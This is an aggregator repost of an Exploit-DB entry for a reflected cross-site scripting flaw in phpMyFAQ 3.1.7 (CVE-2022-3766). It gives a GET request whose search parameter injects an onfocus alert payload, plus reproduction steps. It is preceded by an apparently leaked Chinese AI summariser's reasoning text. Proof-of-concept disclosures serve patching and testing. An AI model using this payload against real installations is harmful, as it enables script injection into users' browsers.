[webapps] phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内。首先,我需要仔细阅读文章内容,理解其中的关键信息。 文章标题是“phpMyFAQ 3.1.7 - 反射型跨站脚本(XSS)漏洞”,日期是2025年11月25日,作者是CodeSecLab。软件链接指向GitHub上的phpmyfaq项目,版本是3.1.7,测试环境是Windows,CVE编号是CVE-2022-3766。 接下来是POC部分,使用GET请求发送到index.php,参数search中包含恶意脚本代码。附加条件提到需要确保没有安全机制阻止这个请求,并且应用版本要在3.1.8之前。步骤包括登录phpmyfaq、发送请求、观察结果。 总结时要涵盖漏洞类型、影响版本、攻击方式和利用条件。控制在一百字以内,所以需要简洁明了。 可能会想到的关键词:反射型XSS、phpMyFAQ 3.1.7、恶意脚本注入、CVE-2022-3766、安全机制绕过。 现在把这些整合成一句话:描述漏洞类型、影响版本、攻击方式和利用条件。 </think> phpMyFAQ 3.1.7 存在反射型跨站脚本(XSS)漏洞,攻击者可通过构造恶意请求注入脚本代码。此漏洞影响版本低于3.1.8的应用程序,并需绕过安全机制。 2025-12-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏

# Exploit Title: phpMyFAQ  3.1.7 - Reflected Cross-Site Scripting (XSS) 
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpmyfaq/
# Software Link: https://github.com/thorsten/phpmyfaq/
# Version: 3.1.7 
# Tested on: Windows
# CVE : CVE-2022-3766


Proof Of Concept
GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29

Additional Conditions:
- Ensure that no security mechanisms (like a web application firewall) are blocking the specific request pattern.
- The application must be running a phpMyFAQ version prior to 3.1.8.


Steps to Reproduce
Log in phpmyfaq.
Send the request.
Observe the result
            

文章来源: https://www.exploit-db.com/exploits/52445
如有侵权请联系:admin#unsafe.sh